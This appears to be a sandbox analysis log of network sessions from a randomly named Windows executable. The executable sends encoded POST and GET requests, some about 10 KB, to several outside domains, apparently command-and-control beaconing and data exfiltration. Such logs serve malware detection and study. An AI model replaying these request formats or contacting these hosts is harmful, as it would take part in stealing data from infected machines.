                                                                      Jan 8, 2025 16:13:27.395483971 CET | 574 | IN | Data Ascii: /li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=log


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      9 | 192.168.2.4 | 49803 | 202.92.5.23 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:33.954086065 CET | 761 | OUT | POST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=XddzRFXpS5iIZ930qfOR3/12jIdsJc9PdKTZWF0b0pPg7EoO0Hmp2r+FcXzdiECNz2JiVgdKMVWHALkrWWCUH0f7lGrAPaWcNNzHVQUzSmFB58Yk3KpA5QQcNZEnq5+kktWcJMxDn0HznFNbYtbjzXK0a9Bup1LJYnchRl7rgtSbP1E1I0wWK+Lg/oxrp8vuDQ==
                                                                      Jan 8, 2025 16:13:34.870903969 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:32 GMT
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:34.870913982 CET | 234 | IN | Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      10 | 192.168.2.4 | 49820 | 202.92.5.23 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:36.506620884 CET | 781 | OUT | POST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07rg8hUO7lepxr+FIHzch0CWz2EdVldKMVCHAJ8rXlqXEEf5wWrCB6WcNNzHVQAZSmNB4MIk4LpflgQfE5Enu5+oktWiJNt5n2PznE9bb8bgoHKuUdB/637MXmVSZVTco8G0OzJvZFRBY+vTiv4fk/SnYaqF4Glf9DfrgvTpBlEe5UM=
                                                                      Jan 8, 2025 16:13:37.453592062 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:37 GMT
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:37.453607082 CET | 224 | IN | Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod
                                                                      Jan 8, 2025 16:13:37.453680992 CET | 10 | IN | Data Ascii: y></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      11 | 192.168.2.4 | 49838 | 202.92.5.23 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:39.052648067 CET | 10863 | OUT | POST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x= [TRUNCATED]
                                                                      Jan 8, 2025 16:13:40.001337051 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:39 GMT
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:40.001355886 CET | 234 | IN | Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      12 | 192.168.2.4 | 49854 | 202.92.5.23 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:41.590441942 CET | 490 | OUT | GET /cboa/?xP7x=af1TSyH9ZKWDWOLhq+7f7Nkki45aGMI6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdZizK3lLDCsG8NLzHSA4XR2l55JJp9Jslyik=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Jan 8, 2025 16:13:42.553694963 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Wed, 08 Jan 2025 15:13:42 GMT
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Jan 8, 2025 16:13:42.553709984 CET | 234 | IN | Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      13 | 192.168.2.4 | 49895 | 194.195.220.41 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:47.747335911 CET | 770 | OUT | POST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=XOD8jI/m6V/6ZqT6W8ux0DH9z2Fvl8OEvTduEFjB2Mz/GnkLRn5X52hKgL8VeSM16IImNlbBY3mYoUZMleeWVEbOWH8+QNZi9A4sS4WTN40zQxgdXx2TPXKTIie2Ffln+I5hfAKigB+iCwA34oKlEBg5rR6bhIgiWiO/h5wLo5oMbhEGpzJWdrcmC30G4W0BDg==
                                                                      Timestamp: Jan 8, 2025 16:13:48.248037100 CET | Bytes transferred: 875 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:48 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip


                                                                      Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49911 | Destination IP: 194.195.220.41 | Destination Port: 80 | PID: 3752 | Process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp: Jan 8, 2025 16:13:50.300302982 CET | Bytes transferred: 790 | Direction: OUT | Data: POST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zj/GCALLm5X62hKvr8caSMu6IEUNnPBY3iYoVpMmveXHkbAen88UNZi9A4sS7q5N4czTBQdWViUJnKQBCe2Bflj+I4EfELFgEiiCxQ356ymNBg/vR7lso8vbB7Knp0w2YM7XHJc4CoBPr4Vfw9y1VJIYqPVo08XreHIs6qTHUvbGzg=
                                                                      Timestamp: Jan 8, 2025 16:13:50.819744110 CET | Bytes transferred: 875 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:50 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip


                                                                      Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49927 | Destination IP: 194.195.220.41 | Destination Port: 80 | PID: 3752 | Process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp: Jan 8, 2025 16:13:52.848522902 CET | Bytes transferred: 10872 | Direction: OUT | Data: POST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zr/Gx4LRBtX72hKmL8RaSN26IMQNnD7Y1KYo3RMjd2XeUbASH8/QNYm9AIoS4S5N4czTHUdAx2USnKTIie6FflH+IgyfEP/g36iDRg36JKmPhg9jx7tsoxvbBm1nqoa2bQ7HC8qoRAfaKEZcBQX+mluZr6glkIf3N3FrI+WDBufYznjIwmi55UDQGhL1nOqyISXnUJTTt+59uvyxuiqBSksJRTnIbnM0KrIhqGWIyFbkm9DN1KTpFIrIuWQwaDze0mY5q0lBtgKAuhpCbuO+bz6vi6JAMyzdTaxCyjw9qtuHZkRSB1fnwM7BJzRSDO3TOcpC4IcuUxnCtxHSbnWt1AWWJI39dLMH/5tfmf61la5zfN16KIDLY6jBCmlXJzGYqBjhMpxwA1nwmkj4nUpbRpkgfHkxILBmGDIPJh62BSM/6kmYC8F1D2DGzXyyKjvvzhjkNa+JMTbrcjQDQV3UMLajFKUOveDo64B2klfQ5crdmxJCGTf61g8cCOuM/NgCTbcwTwAmmnwzvRtqc7lZ9UUDhTNhyo8J/F99lWF4Y/IgYpxbwm1Lq1OfnocTaxwirI2N6cszZfpXTIkjv8XUYpl9md+AdjRIEWKfig0/jCKrrf9IVom7iI9SuTFFYhUXl150Vvt0/qB+8cqbHw2yjGnfQGt/ivenkUhJtMON9dLHpixl+/uLTKnbTaRaMgrlfCFuDvxW7NiV7Q2xvxhmkYzRi4OSVZL6jko6sFF3YyB4eDSMDArPbRF0Z5cYWfF8iR/um168Nek99g3e7yTqfzVhw5/Mhb319mpuK5sYQHYdp8kpO6dxkxmAguatqBTXUBqgXiZp6VqfCaLAt5+DgeFvOR05S6nBp18NfBYaRLE6F5LU+CohJk9RypI+qy+a08ggIehmsmQvVF8JImA8Ev3Cc6GWa1rfp0FUR2Q3hiucmmzUPPU97ZgCjWWIXKsrFtmpqs [TRUNCATED]
                                                                      Timestamp: Jan 8, 2025 16:13:53.346621990 CET | Bytes transferred: 200 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:53 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                      Data Ascii: f


                                                                      Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49946 | Destination IP: 194.195.220.41 | Destination Port: 80 | PID: 3752 | Process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp: Jan 8, 2025 16:13:55.390995979 CET | Bytes transferred: 493 | Direction: OUT | Data: GET /0gis/?F4=Q0yHy&xP7x=aMrcg/vn2G/nVrncRMrksgj//l1iguTCuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbbVz+e205UYRB0QccYqidFK5nXCUGR2PtEFk= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Timestamp: Jan 8, 2025 16:13:55.916239977 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 08 Jan 2025 15:13:55 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Ascii: 50a<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.earbudsstore.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.earbudsstore.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1736349235.9785162264&other_args=eyJ1cmkiOiAiLzBnaXMiLCAiYXJncyI6ICJGND1RMHlIeSZ4UDd4PWFNcmNnL3ZuMkcvblZybmNSTXJrc2dqLy9sMWlndVRDdURoVU9UajJvY1dyUVhrb1BIRmJsbjFGbUxvVGFXWTc0S1JvV2tYU1pVU2JqMmRDMXFXYmJWeitlMjA1VVlSQjBRY2NZcWlkRks1blhDVUdSMlB0RUZrPSIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGl [TRUNCATED]
                                                                      Timestamp: Jan 8, 2025 16:13:55.916256905 CET | Bytes transferred: 222 | Direction: IN | Data: (continuation of the response body, decoded below)
                                                                      Data Ascii: 9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43IiwgInVyaV9jIjogImM4MmMiLCAiYXJnc19jIjogIjQyZTEiLCAicmVmZXJlcl9jIjogImY1YmUiLCAiYWNjZXB0X2MiOiAiNGNmYyJ9"; } </script> </body></html>0


                                                                      Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 49981 | Destination IP: 103.230.159.86 | Destination Port: 80 | PID: 3752 | Process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp: Jan 8, 2025 16:14:01.834741116 CET | Bytes transferred: 776 | Direction: OUT | Data: POST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=+cCAFC3M4Oqm42EF3HljeJGS8Ni3poP3NTj+mRYqzA+awjGZ2os1OZCkYYZW76GFEfxx8NaODGzUs5WKYI1hSIffBxV3N0xrQa4E52ATIRKrU5VqE6jRVxr7cCkKxOWkMZwjMsy4YE97fUG2gpZFqoucUECvqDRMd78GoN+msad2Ga7yDzYYi/L1sq+5Ne3tPA==
                                                                      Timestamp: Jan 8, 2025 16:14:02.727698088 CET | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:02 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 49999 | Destination IP: 103.230.159.86 | Destination Port: 80 | PID: 3752 | Process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp: Jan 8, 2025 16:14:04.378077030 CET | Bytes transferred: 796 | Direction: OUT | Data: POST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzaawC2Z3ps1PZCkT4YclKGOEfNH8IiODGnUs8yKZ51iTYfdABV1SkxrQa4E52U9IXirVKdqGYHWKBr4ZCkK1OWgMZx2MteGYHJ7fV22g4ZG94v2bkDCk20+bK1ejsemiIJIO82oSC5Pw/vGxt3NAdKkUOstxKnGOsjIhExQzJeMnKo=
                                                                      Timestamp: Jan 8, 2025 16:14:05.235606909 CET | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:05 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 50016 | Destination IP: 103.230.159.86 | Destination Port: 80 | PID: 3752 | Process: C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp: Jan 8, 2025 16:14:06.925929070 CET | Bytes transferred: 10878 | Direction: OUT | Data: POST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=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 [TRUNCATED]
                                                                      Timestamp: Jan 8, 2025 16:14:08.022977114 CET | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:14:07 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      20 | 192.168.2.4 | 50022 | 103.230.159.86 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:14:09.473546982 CET | 495 | OUT | GET /bwyw/?xP7x=zeqgG3zf3rSD22A0zF0pS4vI7saWqLmuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wffK6dIQcBGg0ObpA/yX4xEky+b5csM5WXdi0=&F4=Q0yHy HTTP/1.1
